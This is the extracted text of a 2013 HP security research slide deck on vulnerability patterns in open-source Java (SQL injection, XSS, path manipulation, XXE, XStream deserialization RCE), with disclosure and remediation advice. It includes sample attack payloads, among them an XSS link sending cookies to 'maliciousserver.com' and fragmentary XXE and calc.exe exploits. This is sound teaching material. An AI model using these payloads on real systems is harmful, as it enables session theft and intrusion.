© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Critical vulnerability patterns in open-source Java Alvaro Muñoz, Software Security Researcher

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 2 Whois Alvaro Muñoz Employer Hewlett-Packard Organization HP Software Security Research Responsibilities Research the security impact of new technologies. Specially interested on Web stuff, any language, any framework. In previous episodes Application Security Consultant Pentester Other Stuff CTF player, OSCP, GWAPT, CISSP … Location Madrid, Spain @pwntester

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 3 Critical vulnerability patterns in open-source Java Agenda 1.  Why should I care in the first place? 2.  OSS Security Posture 3.  Critical issues in OSS applications 4.  Critical issues in OSS components 5.  Disclosure in the open source world 6.  Five steps to open source peace of mind

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Why should I care in the first place?

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 5 Some metrics “By 2015 ninety-nine percent of mission critical applications in Global 2000 companies will contain open source.” “80% of the code in today’s applications comes from libraries and frameworks” “More than half of Global 500 companies are using open source applications with known vulnerabilities” “26% of library downloads have known vulnerabilities” Gartner & SonaType & Aspect Security Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 6 Using Components with Known Vulnerabilities New OWASP Top10 2013 – A9 Source: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/OWASP-Top-Ten-2013/ba-p/6046369

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. OSS Security Posture

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 8 The research Goal: •  Figure out the security posture of Open Source Software Procedure: •  Analyze 10 popular Java open source applications with Fortify SCA •  Use the same Fortify SCA version and rulepacks for all tests •  Scan the latest released snapshot as well as a three years old version •  Focus on the critical issues only •  Manually review a popular open source library

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 9 The applications •  Messaging and Integration Patterns server Apache ActiveMQ •  Portlet container Liferay Portal •  Implementation of the Java Servlet and JSP technologies Apache Tomcat •  Application server that implements the Java EE JBoss •  Continuous integration Server Cruise Control •  Full-featured, multi-user and group-blog server Apache Roller •  Enterprise resource planning (ERP) system Ofbiz •  Website content management system OpenCMS •  A light weight, open source, blogger Pebble •  Microfinance institution management system Mifos

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 10 Persistent XSS Reflected XSS Insecure Password submission SQL injection Path Manipulation Privacy Violation XML External Entity Inj Command Injection ActiveMQ ✔ ✔ ✔ ✔ ✔ Apache Roller ✔ ✔ Apache Tomcat ✔ ✔ ✔ ✔ Cruise Control ✔ ✔ ✔ JBoss ✔ ✔ Liferay Portal ✔ ✔ ✔ ✔ OfBiz ✔ ✔ ✔ ✔ OpenCMS ✔ ✔ ✔ Pebble ✔ ✔ Mifos ✔ ✔ SCA Findings

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 11 # Critical findings 0 20 40 60 80 100 120 3 years Current

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 12 # Critical findings Density 0 1 2 3 4 5 6 7 3 years Current

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Critical issues in OSS Applications

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 14 Example 1: SQL Injection 1.  String uid = request.getParameter(“id”); 2.  String query = “select name from Users where id = “ + uid; 3.  dbconn.executeQuery(query); http:///page.jsp?id=1 SELECT name FROM Users WHERE id = 1

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 15 Example 1: SQL Injection 1.  String uid = request.getParameter(“id”); 2.  String query = “select name from Users where id = “ + uid; 3.  dbconn.executeQuery(query); http:///page.jsp?id=1 union select ccid from Cards SELECT name FROM Users WHERE id = 1 UNION SELECT ccid FROM Cards

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 16 Dataflow diagram Example 1 : SQL injection

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 17 1.  @GET 2.  @Consumes({ MediaType.APPLICATION_JSON }) 3.  @Produces({ MediaType.APPLICATION_JSON }) 4.  public String retrieveStaff(UriInfo uriInfo,@QueryParam("sqlSearch") String sqlSearch, @QueryParam("officeId") Long officeId) { 5.  context.authenticatedUser().validateHasReadPermission(resourceNameForPermissions); 6.  final Collection staff = this.readPlatformService.retrieveAllStaff(sqlSearch, officeId); 7.  final ApiRequestJsonSerializationSettings settings = apiRequestParameterHelper.process(uriInfo.getQueryParameters()); 8.  return this.toApiJsonSerializer.serialize(settings, staff, RESPONSE_DATA_PARAMETERS); 9.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 18 1.  @GET 2.  @Consumes({ MediaType.APPLICATION_JSON }) 3.  @Produces({ MediaType.APPLICATION_JSON }) 4.  public String retrieveStaff(UriInfo uriInfo,@QueryParam("sqlSearch") String sqlSearch, @QueryParam("officeId") Long officeId) { 5.  context.authenticatedUser().validateHasReadPermission(resourceNameForPermissions); 6.  final Collection staff = this.readPlatformService.retrieveAllStaff(sqlSearch, officeId); 7.  final ApiRequestJsonSerializationSettings settings = apiRequestParameterHelper.process(uriInfo.getQueryParameters()); 8.  return this.toApiJsonSerializer.serialize(settings, staff, RESPONSE_DATA_PARAMETERS); 9.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 19 1.  @Override 2.  public Collection retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 20 1.  @Override 2.  public Collection retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 21 1.  private String getStaffCriteria(final String sqlSearch, final Long officeId) { 2.  String extraCriteria = "”; 3.  if (sqlSearch != null) { 4.  extraCriteria = " and (" + sqlSearch + ")"; 5.  } 6.  if (officeId != null) { 7.  extraCriteria += " and office_id = " + officeId; 8.  } 9.  if (StringUtils.isNotBlank(extraCriteria)) { 10.  extraCriteria = extraCriteria.substring(4); 11.  } 12.  return extraCriteria; 13.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 22 1.  private String getStaffCriteria(final String sqlSearch, final Long officeId) { 2.  String extraCriteria = "”; 3.  if (sqlSearch != null) { 4.  extraCriteria = " and (" + sqlSearch + ")"; 5.  } 6.  if (officeId != null) { 7.  extraCriteria += " and office_id = " + officeId; 8.  } 9.  if (StringUtils.isNotBlank(extraCriteria)) { 10.  extraCriteria = extraCriteria.substring(4); 11.  } 12.  return extraCriteria; 13.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 23 1.  private String getStaffCriteria(final String sqlSearch, final Long officeId) { 2.  String extraCriteria = "”; 3.  if (sqlSearch != null) { 4.  extraCriteria = " and (" + sqlSearch + ")"; 5.  } 6.  if (officeId != null) { 7.  extraCriteria += " and office_id = " + officeId; 8.  } 9.  if (StringUtils.isNotBlank(extraCriteria)) { 10.  extraCriteria = extraCriteria.substring(4); 11.  } 12.  return extraCriteria; 13.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 24 1.  @Override 2.  public Collection retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 25 1.  @Override 2.  public Collection retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 26 1.  private Collection retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 27 1.  private Collection retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 28 1.  private Collection retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 29 1.  private Collection retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 30 Example 2: Cross-Site Scripting

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 31 Example 2: Cross Site Scripting http:///page.jsp?user=John

Hi John!

Hi John!

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 32 Hi! Example 2: Cross Site Scripting http://host/page.jsp?user=alert(“xss”)

Hi alert(“xss”)!

xss

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 33 Will you click on this link?? www.mybank.com/transfers?user=window.open(“http:// maliciousserver.com/cookiestealer.php?” + document.cookie());

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 34 What about this one? http://bit.ly/XSpPhP

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 35 Hialert(“xss”)! Example 2: Cross Site Scripting http://host/page.jsp?user=alert(“xss”)

Hi <script>alert(“xss”)</script>!

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 36 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 37 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  } Safe output encoding

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 38 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 39 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 40 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 41 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 42 Example 3: Path Manipulation

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 43 1.  public View process(HttpServletRequest request, HttpServletResponse response) throws ServletException { 2.  Blog blog = (Blog)getModel().get(Constants.BLOG_KEY); 3.  String name = request.getParameter("name"); 4.  String type = request.getParameter("type"); 5.  String path = request.getParameter("path"); 6.  String content = request.getParameter("fileContent"); 7.  try { 8.  FileManager fileManager = new FileManager(blog, type); 9.  fileManager.saveFile(path, name, content); 10.  if (type.equals(FileMetaData.THEME_FILE)) { 11.  fileManager = new FileManager(blog, FileMetaData.BLOG_DATA); 12.  fileManager.saveFile("/theme" + path, name, content); 13.  } 14.  blog.info("File \"" + StringUtils.transformHTML(name) + "\" saved."); 15.  } catch (IllegalFileAccessException e) { 16.  return new ForbiddenView(); 17.  } catch (IOException ioe) { 18.  throw new ServletException(ioe); 19.  } 20.  return new ForwardView("/editFile.secureaction"); 21.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 44 1.  public void saveFile(String path, String name, String content) throws IOException, IllegalFileAccessException { 2.  FileMetaData subDirectory = getFileMetaData(path); 3.  File fileToSave = new File(getFile(subDirectory), name); 4.  if (!isUnderneathRootDirectory(fileToSave)) { 5.  throw new IllegalFileAccessException(); 6.  } 7.  BufferedWriter writer = null; 8.  try { 9.  writer = new BufferedWriter(new FileWriter(fileToSave)); 10.  writer.write(content); 11.  writer.flush(); 12.  } finally { 13.  IOUtils.closeQuietly(writer); 14.  } 15.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Critical issues in OSS Components

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 46 A closer look at Spring In their own words:

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 47 Security issues reported: Timeline Date CVE # Description 09 October 2012 CVE-2012-5055 Spring Security's DaoAuthenticationProvider can reveal if a username is valid 29 March 2012 CVE-2012-1833 Grails data binding vulnerability 9 September 2011 CVE-2011-2894 Spring Framework and Spring Security serialization-based remoting vulnerabilities 9 September 2011 CVE-2011-2732 Spring Security header injection vulnerability 9 September 2011 CVE-2011-2731 Spring Security Privilege escalation when using RunAsManager 9 September 2011 CVE-2011-2730 Spring Framework Information Disclosure and remote code execution 10 August 2011 CVE-2011-0527 vFabric tc Server password obfuscation bypass 24 May 2011 CVE-2011-1942 Spring Web Services: Information Disclosure 5 February 2011 CVE-2009-2899 Hyperic HQ: Information disclosure 27 October 2010 CVE-2010-3700 Spring Security: Bypass of security constraints 17 June 2010 CVE-2010-1622 Spring Framework: Execution of arbitrary code 13 May 2010 CVE-2010-1454 tc Server Runtime: Unauthenticated access to remote JMX interface 23 March 2010 CVE-2009-2907 Hyperic HQ: Multiple XSS 2 October 2009 CVE-2009-2898 Hyperic HQ: Stored XSS 2 October 2009 CVE-2009-2897 Hyperic HQ: Reflected XSS 22 April 2009 CVE-2009-1190 Spring Framework: Remote denial of service

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 48 RESTFul APIs •  RESTFul APIs are becoming more popular •  They can be found everywhere, especially for powering up mobile applications •  The most popular frameworks for Java are JAX-RS and SpringMVC •  SpringMVC uses SpringOXM to un-marshall the incoming XML messages into Java Objects John Smith Friend public void createContact(Contact c) { save(c); log(c.getDescription()); }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 49 XML Entities XML External Entity Injection (XXE) ”>]> … … &terms; …

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 50 XML Entities XML External Entity Injection (XXE) ]> … … &terms; …

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 51 Anatomy of an XXE Attack public void createContact(Contact c) { save(c); } public Contact getContact(Long id) { Contact c = getContact(id); return c; } RESTFul WebService

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 52 Anatomy of an XXE Attack John Smith Friend public void createContact(Contact c) { save(c); } RESTFul WebService public Contact getContact(Long id) { Contact c = getContact(id); return c; }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 53 Anatomy of an XXE Attack public void createContact(Contact c) { save(c); } Name: John! Last name: Smith! Description:! Friend! RESTFul WebService public Contact getContact(Long id) { Contact c = getContact(id); return c; } John Smith Friend

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 54 Anatomy of an XXE Attack John Smith &xxe; ]> public Contact getContact(Long id) { Contact c = getContact(id); return c; } public void createContact(Contact c) { save(c); }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 55 John Smith &xxe; Anatomy of an XXE Attack Name: John! Last name: Smith! Description:! root:*:0:0:System:/var/root:/bin/sh! user1:*:0:0:System:/var/root:/bin/sh! user2:*:0:0:System:/var/root:/bin/sh! user3:*:0:0:System:/var/root:/bin/sh! ! public void createContact(Contact c) { save(c); } public Contact getContact(Long id) { Contact c = getContact(id); return c; } ]>

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 56 SpringOXM unmarshallers SpringOXM is a wrapper around a a variety of unmarshalers including: •  JAXB •  Castor •  XStream Our research concludes that: •  Xstream Wrapper is not vulnerable since it does not process DOCTYPE blocks •  Castor Wrapper is insecure but there is an undocumented way to secure it •  JAXB Wrapper is insecure and there is no way to secure it Unfortunately JAXB is by far the most popular

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 57

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 58 •  XStream is not exactly a marshaller as it allows full object serialization •  http://xstream.codehaus.org/converters.html contains a complete list of objects that can be serialized •  One interesting class: DynamicProxyConverter Remote Code Execution in XStream unmarshaller

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 59 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Class filed1 field2 method1 method2 method3

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 60 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Interface method1 method2 Implementation filed1 field2 method1 method2 method3

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 61 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Interface method1 method2 Object filed1 field2 method1 method2 method3 Proxy method2 Custom code

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 62 Turning a Feature into a Bug Attacker’s plan: •  Find out what Class the XML will be deserialized to •  Create a proxy for that Class the WebService is waiting for •  Intercept/hook any call to any method in the interface •  Replace the original call with the malicious payload •  Send the serialized version of the proxy •  Cross-fingers •  Profit

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 63

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 64 Exploit 1 <firstName>alvarofirstName> munoz [email protected]

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 65 Exploit org.company.model.Contact calc.exe start 1 <firstName>alvarofirstName> munoz [email protected]

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 66 Meanwhile in the application code … 1.  @Controller 2.  @RequestMapping("/contacts") 3.  public class ContactController { 4.  @Autowired 5.  private ContactRepository contactRepository; 6.  @RequestMapping( method = RequestMethod.POST ) 7.  @ResponseStatus( HttpStatus.CREATED ) 8.  public final String create( @RequestBody Contact contact ){ 9.  log(”Creating new contact: " + contact.getFirstName()); 10.  contactRepository.save(contact); 11.  return "OK"; 12.  } 13.  }

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 67 1.  @Controller 2.  @RequestMapping("/contacts") 3.  public class ContactController { 4.  @Autowired 5.  private ContactRepository contactRepository; 6.  @RequestMapping( method = RequestMethod.POST ) 7.  @ResponseStatus( HttpStatus.CREATED ) 8.  public final String create( @RequestBody Contact contact ){ 9.  log(”Creating new contact: " + contact.getFirstName()); 10.  contactRepository.save(contact); 11.  return "OK"; 12.  } 13.  } Meanwhile in the application code …

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 68

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Disclosure in the Open Source World

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 70 Responsible Disclosure •  Open Source projects have been notified about the issues found during this research •  Reactions cover the whole spectrum: from immediate response to no response at all Special thanks to the developers and maintainers of the SpringSource project for their prompt responses

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 71 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 72 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 73 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 74 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 75 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository The conversation goes on … Conclusion, 9 months after the issue is still open!

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 76

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 77 OSS developers Vs. Security Researchers Gap Developers vs. security auditors is an ongoing battle •  OSS is not an exception •  In mature OSS projects there is a Security team to smooth it down Security researchers cannot just break in and try to change how things are done •  Developers need remediation guidance Security issues are normally reported in a non actionable way •  Developers need to understand issues if you want them to change their code Avoid using security buzzy talk e.g.: Cross-site scripting vs Lack of output encoding

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 78 Rewarding Researchers for Responsibly Disclosing Vulnerabilities Zero Day Initiative (ZDI) World’s Leading Vulnerability Bounty Program •  Network of Almost 3,000 Researchers Worldwide •  $8 Million Paid to Researchers •  Disclosed Over 1300 Vulnerabilities Patching of Critical Defects in Software •  36% of Oracle Java’s Critical Vulnerabilities with CVSS > 9.0 •  ~50% of Microsoft Critical Vulnerabilities in 2013 Proven Thought Leadership •  Pwn2Own Hacking Competition Series •  Frost & Sullivan Market Share Leader 2012 •  Leader in Critical Vulnerability Disclosures in 2013

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Five steps to open source peace of mind

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 80 Step 1: Identify your open source usage 1.1 Identify Open Source Software used throughout your company and versions –  Libraries –  Frameworks –  Middleware –  Applications 100% open source (CMS, Blogs, Application servers …) 1.2 Create and validate against a release policy –  Automate this process when possible 1.3 Use data collected to build profiles on each project –  Open source code’s origin –  Where to get updates (including security alerts) –  How often the community releases new versions

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 81 Step 2: Assess OSS for vulnerabilities / fix issues 2.1 Evaluate the open source code used in your enterprise for vulnerabilities –  Community bug tracking system and mailing lists –  BugTraq (www.securityfocus.com) –  MITRE’s Common Vulnerability and Exposures (CVE) (cve.mitre.org) –  Open Sourced Vulnerability Database (http://www.osvdb.org) –  National Vulnerability Database (http://nvd.nist.gov) 2.2 Security Testing –  Automated Static, Dynamic, and Runtime Analysis for OSS Components –  Manual Code Review 2.3 Fixing vulnerabilities –  Ask the open source community to fix them –  Fix them yourself

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 82 Step 3: Develop open source usage policies 3.1 Establish a policy on acceptable open source usage within your enterprise –  Using your inventory and risk assessments, generate a list of approved OSS –  OSS should be maintained in an internal repository –  Create the processes to update and maintain the repository 3.2 Communication –  Project managers –  Developers –  Testers –  Architects –  Application owners

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 83 Step 4: Develop a patch management process 4.1 Don’t forget to include OSS in your patch management process –  When new vulnerabilities are identified: •  Explore possible mitigation strategies to implement until patch is available •  Once released, inform your development teams •  Make sure there is a patch plan in place

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 84 Step 5: Create a compliance gate 5.1 Compliance validation for the OSS usage policy –  Add a compliance check to any existing security or verification steps in your SDLC –  Periodic compliance checks

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Thank you!

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Security for the new reality